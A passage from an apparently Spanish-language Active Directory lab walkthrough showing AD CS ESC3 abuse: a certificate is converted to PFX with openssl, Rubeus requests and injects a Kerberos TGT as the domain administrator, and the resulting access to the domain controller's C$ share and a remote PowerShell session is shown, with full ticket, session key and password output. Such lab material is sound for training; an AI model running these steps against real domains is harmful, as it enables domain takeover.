QNQHMSyv1EuxCAEQi2lgTrWQ6Ie8jgeAHPPnr5tPOMElTPb8/PIf2UbNfKbWiq0J
n44p4OBQ8y3QmCc6+NwjRAYrgI3JUehpNpRkssDcOow2sdmAubKgUqGCdn1EAL85
kUxNLhY0DFQIkbCHqJV3AxoNAgMBAAGjggMmMIIDIjA9BgkrBgEEAYI3FQcEMDAu
BiYrBgEEAYI3FQiF4ahyh8yfaOGHJoKfrlGC8vZ9gT+GtKVfh7r6GAIBZAIBCTAp
BgNVHSUEIjAgBggrBgEFBQcDBAYKKwYBBAGCNwoDBAYIKwYBBQUHAwIwDgYDVR0P
AQH/BAQDAgeAMDUGCSsGAQQBgjcVCgQoMCYwCgYIKwYBBQUHAwQwDAYKKwYBBAGC
NwoDBDAKBggrBgEFBQcDAjAdBgNVHQ4EFgQUSFsyoApfVaR3I4BsP6t6vT6ndfUw
HwYDVR0jBBgwFoAU0f6NCqf6tDKfNvwguPfLnmjFRe0wgdgGA1UdHwSB0DCBzTCB
yqCBx6CBxIaBwWxkYXA6Ly8vQ049bW9uZXljb3JwLU1DT1JQLURDLUNBLENOPW1j
b3JwLWRjLENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2
aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW1vbmV5Y29ycCxEQz1sb2NhbD9jZXJ0
aWZpY2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJp
YnV0aW9uUG9pbnQwgcsGCCsGAQUFBwEBBIG+MIG7MIG4BggrBgEFBQcwAoaBq2xk
YXA6Ly8vQ049bW9uZXljb3JwLU1DT1JQLURDLUNBLENOPUFJQSxDTj1QdWJsaWMl
MjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERD
PW1vbmV5Y29ycCxEQz1sb2NhbD9jQUNlcnRpZmljYXRlP2Jhc2U/b2JqZWN0Q2xh
c3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTA4BgNVHREEMTAvoC0GCisGAQQBgjcU
AgOgHwwdYWRtaW5pc3RyYXRvckBtb25leWNvcnAubG9jYWwwTAYJKwYBBAGCNxkC
BD8wPaA7BgorBgEEAYI3GQIBoC0EK1MtMS01LTIxLTMzNTYwNjEyMi05NjA5MTI4
NjktMzI3OTk1MzkxNC01MDAwDQYJKoZIhvcNAQELBQADggEBAD+O48hX4Hq0kOgT
xJh2+T9VfZs4NOk0MmzDzmhvOR1GxXsGzjQ0V9dUQjc8kWdqLQu+KGPuM0na1yKv
xQ7whHTX6XOSOy0j3tJqskzFF7sGmr49fd/G8Ch/DRCctETnpYmFlme2RzD9Viht
x6PI5ZICx1Idd8Bh/R6Jle7C3871ingPbIBimuGoYMJPtnSSRi6dpbq6A67q1QIG
CAZkhg+iVIkxj8+2ktYQer7Ph5owFGug3pDKcWfvEw9NO4nbDDGU/XKVoOJEBu/o
gPO+wNmW/abq0eJwyUXCmw5ZpHMquoySjtKKcL5WB1kdtMFjl/OuE2Ls5VaD5qNR
2DRbl2k=
-----END CERTIFICATE-----

Guardamos cert.pem en un archivo y volvemos a convertir a pfx.

PS C:\AD\Tools\openssl> .\openssl.exe pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out esc3user.pfx
WARNING: can't open config file: /usr/local/ssl/openssl.cnf
Enter Export Password:
Verifying - Enter Export Password:
PS C:\AD\Tools\openssl>

Ahora, usamos Rubeus para cargar el pfx y obtener un ticket para administrator.

PS C:\AD\Tools\openssl> ..\Rubeus.exe asktgt /user:moneycorp.local\administrator /certificate:esc3user.pfx /dc:mcorp-dc.moneycorp.local /password:SecretPass@123 /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.1

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=Administrator, CN=Users, DC=moneycorp, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'moneycorp.local\administrator'
[*] Using domain controller: 172.16.1.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      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
[+] Ticket successfully imported!

  ServiceName              :  krbtgt/moneycorp.local
  ServiceRealm             :  MONEYCORP.LOCAL
  UserName                 :  administrator
  UserRealm                :  MONEYCORP.LOCAL
  StartTime                :  3/4/2024 7:32:24 AM
  EndTime                  :  3/4/2024 5:32:24 PM
  RenewTill                :  3/11/2024 8:32:24 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  k2JTw+0tX/nDY1q8p5OQXA==
  ASREP (key)              :  DD25ADB77E7B591EE7AE44FB9E931596

Y luego podemos validar que el ticket funciona correctamente.

PS C:\AD\Tools\openssl> ls \\mcorp-dc\c$


    Directory: \\mcorp-dc\c$


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          5/8/2021   1:20 AM                PerfLogs
d-r---        11/10/2022   9:53 PM                Program Files
d-----          5/8/2021   2:40 AM                Program Files (x86)
d-r---        11/11/2022   6:33 AM                Users
d-----         1/10/2024   1:35 AM                Windows


PS C:\AD\Tools\openssl> Enter-PSSession -Computername mcorp-dc
[mcorp-dc]: PS C:\Users\Administrator\Documents> whoami
mcorp\administrator
[mcorp-dc]: PS C:\Users\Administrator\Documents> hostname
mcorp-dc
[mcorp-dc]: PS C:\Users\Administrator\Documents>

PreviousLearning Objective - 21 NextAD CS - ESC6

Last updated 1 year ago